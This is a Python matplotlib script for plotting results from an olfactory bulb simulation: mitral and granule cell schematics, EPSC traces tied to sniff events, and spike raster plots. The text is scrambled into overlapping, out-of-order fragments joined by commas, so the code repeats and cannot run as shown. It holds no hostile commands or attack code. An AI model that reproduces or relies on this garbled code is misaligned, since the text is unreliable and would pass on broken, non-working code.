cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\", "data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path,", "= syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) )", "== 1: if comp[idx] >= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\", "numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.) # Glom ax.plot([xloc],", "onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2)", "\\ horizontalalignment='left', verticalalignment='center') # Mark delay interval for i in range(len(breath_events)): if breath_events[i]", "= BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays = read_delayevents()", "- 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude interval", "\\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top',", "color='blue') for breath in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray',", "os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts)", "= syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) )", "verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center',", "if breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\", "mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark sniff interval for i in range(len(breath_events)): if", "= numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax =", "gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5,", "\\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes =", "2011 @author: - \"\"\" import os import numpy from matplotlib import pyplot from", "fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black')", "spiketrain from params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax,", "tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:]", "= syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC", "markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax):", "\\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left',", "BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays = read_delayevents() dt", "sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\", "cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio", "sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2,", "data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width,", "m in M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data", "from matplotlib import pyplot from neuronpy.graphics import spikeplot from bulbspikes import * from", "verticalalignment='center') # Mark delay interval for i in range(len(breath_events)): if breath_events[i] > 1400:", "label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b,", "cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in range(len(wts)): if wts[i]", "from neuronpy.graphics import spikeplot from bulbspikes import * from neuronpy.util import spiketrain from", "for m in M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt'))", "read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i in range(5): data.append([])", "-*- \"\"\" Created on Sun Mar 6 18:22:04 2011 @author: - \"\"\" import", "= sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in range(len(wts)): if wts[i] > 0.0001:", "range(len(breath_events)): if breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28),", "sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a,", "raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0], pair[1], fi)) fig.savefig(os.path.join(analysis_path,", "'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0], pair[1], fi)) fig.savefig(os.path.join(analysis_path, 'fig1.pdf')) raster()", "gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks =", "blueplt = syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2],", "label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red')", "numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for", "if b >= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx", "onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input onto red',", "homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5))", "draw_weights(pair, schematic_ax, color='black') # Analyze an output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop'])", "0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]]", "numpy.multiply(x,-1./20.)) idx = 0 for b in breath_events: if b >= tstop: break", "arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250 ms', \\ horizontalalignment='center',", "breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data',", "color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)',", "label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5)", "horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude interval span = syn_ax.annotate('', xy=(1190,", "span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2)", "mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0 #", "marker='o', color='red') # idx += 1 idx = 0 for i in mask_b:", "= 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp],", "syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input onto red', 'input onto blue'], \\", "range(len(breath_events)): if breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5),", "raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for", "ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc", "markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7,", "breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule", "verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx", "mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp", "y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101),", "= bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright =", "= homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.)", "i == 1: if comp[idx] >= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*',", "in cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in range(len(wts)): if", "granule cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir,", "\"\"\" Created on Sun Mar 6 18:22:04 2011 @author: - \"\"\" import os", "markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100))", "+= 1 redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath in", "yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc],", "= \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0 # for i in", "gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright", "#ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization", "markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in", "delay interval for i in range(len(breath_events)): if breath_events[i] > 1400: span = syn_ax.annotate('',", "color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an output file in", "wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in range(len(wts)): if wts[i] >", "amplitude interval span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\", "mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position()", "bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays =", "= read_delayevents() dt = 1 tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0 =", "= (0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray',", "fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1, pair) # pos2 = (10+pair[1]*20,", "M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i in range(5): data.append([]) for", "linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos", "[10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom')", "ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25)", "def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none')", "M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i in range(5): data.append([]) for", "numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec,", "for i in range(len(breath_events)): if breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5),", "0 # for i in mask_a: # if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9],", "1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%', \\", "output\\n granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos", "\\ ['sniff event', 'input onto red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1.,", "ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 # Lateral dends", "10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp',", "in range(len(breath_events)): if breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17,", "m in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1", "# Mark amplitude interval span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\", "-*- coding: utf-8 -*- \"\"\" Created on Sun Mar 6 18:22:04 2011 @author:", "breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike", "Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9,", "idx = 0 for i in mask_b: if i == 1: if comp[idx]", "transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf')", "breath_events: if b >= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx]", "pos2 = (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7))", "if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1 idx", "linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt],", "synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for", "timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'):", "\\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt,", "raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1, pair) # pos2", "stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax", "xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/-", "data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1, pair)", "an output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt'))", "wts/numpy.max(wts) for i in range(len(wts)): if wts[i] > 0.0001: cellloc = 10+cellid*20 y", "= numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for b in", "if wts[i] > 0.0001: cellloc = 10+cellid*20 y = numpy.abs(i - cellloc) yloc", "pair) # stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax =", "10+cellid*20 y = numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc],", "marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax)", "linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position()", "1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5)", "else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx]", "os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim =", "cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1, pair) # pos2 =", "@author: - \"\"\" import os import numpy from matplotlib import pyplot from neuronpy.graphics", "alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8],", "markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1',", "numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for b in breath_events:", "savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref',", "breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([])", "for i in mask_b: if i == 1: if comp[idx] >= xlim[0] and", "xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150", ") syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay interval", "schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline')", "[ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n',", "Mar 6 18:22:04 2011 @author: - \"\"\" import os import numpy from matplotlib", "for breath in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2)", "\\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') #", "yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\", "coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0", "= int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = syn_ax.plot(x,y0, color='red') blueplt", "def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\", "(0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2)", "ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center')", "linewidth=0.) # Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color,", "[] for i in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data", "output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts", "raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids: wts = sws.m2g[cellid,:,0] wts =", "in range(len(wts)): if wts[i] > 0.0001: cellloc = 10+cellid*20 y = numpy.abs(i -", "i in range(len(breath_events)): if breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data',", "Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.) #", "where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.) # Glom ax.plot([xloc], [9], color=color, marker='o',", "\\ numpy.multiply(x,-1./20.)) idx = 0 for b in breath_events: if b >= tstop:", "= raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0], pair[1],", "span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2)", "Mark sniff interval for i in range(len(breath_events)): if breath_events[i] > xlim[0]: span =", "every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude", "params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = 